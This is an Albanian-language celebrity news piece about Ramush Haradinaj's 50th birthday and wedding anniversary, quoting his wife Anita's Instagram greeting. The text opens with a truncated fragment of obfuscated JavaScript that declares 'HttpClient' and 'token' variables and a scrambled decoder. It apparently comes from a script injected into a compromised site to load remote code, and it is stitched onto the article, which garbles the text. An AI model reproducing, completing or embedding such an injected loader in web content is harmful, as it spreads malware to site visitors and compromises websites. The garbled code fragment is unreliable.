;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Haradinaj u bë 50 vjeç, urimi i Anitës do t’iu bëjë të qeshni!

By

Ditëlindja e Ramush Haradinajt, s’është e vetmja festë në familjen e tij sot.

Ai mbushi gjysmë shekulli jetë, por jo vetëm kaq. Kryeministri i Kosovës, këtë të marte feston edhe 14 vjetorin e martesës me moderatoren e njohur kosovare, Anita Haradinajn.

 

Dyshja që kanë 14-të vjet të martuar, kanë tre fëmijë nga kurora e tyre, Gjinin, Hanën dhe Trimin, ndërsa në këto 14-të vjet jo gjithçka ka qenë e lehtë për ta, për shkak të aktivitetit politik dhe atij ushtarak të Haradinajt në të kaluarën.

Por ditë të lumtura kanë ardhur për ta dhe në këtë përvjetor të rëndësishëm, është Anita ajo që e ka uruar bashkëshortin e saj përmes profilit në Instagram.

“Burri jem i ka bo 50 vjet! Ka ra me flejt se s’dojke me u marr vesh. Plus 14 vjet martesë!! Ama unë nejta me ja uru se shumë më pëlqejke”, ka shkruar Anita, për të bërë pastaj edhe një urim tjetër, shumë më romantik.

“Historite tona veshtire se mund t’i kuptosh nese nuk i ke provuar, sot edhe ndoshta mund t’a kemi flakur romantizmin tutje, por kemi 15 vjet bashke dhe sot festojme dy festa, sot kur ne jemi me shume se familje, me shume se te dashur, me shume se çift, sot jemi une ti dhe tre femije!!! Sot ne mos asgje perfaqesojme shume dashuri brenda botes tone te vogel me te mirat dhe te keqijat qe dashuria i ngerthen ne vehte!!! Gezuar Ramush Haradinaj!! Te duam shume Gjini, Hana, Trimi e une edhe ma shume!!! P.s vazhdoj me mendu qe jom ende dhurata ma e mire qe najhere e ke marre per ditelindje!! Përveç Ditelindjes, Gezuar edhe 15 vjet martese ( veshtire boll ama pune qefi burre)”, ka shkruar moderatorja.

Artikuj të ngjashëm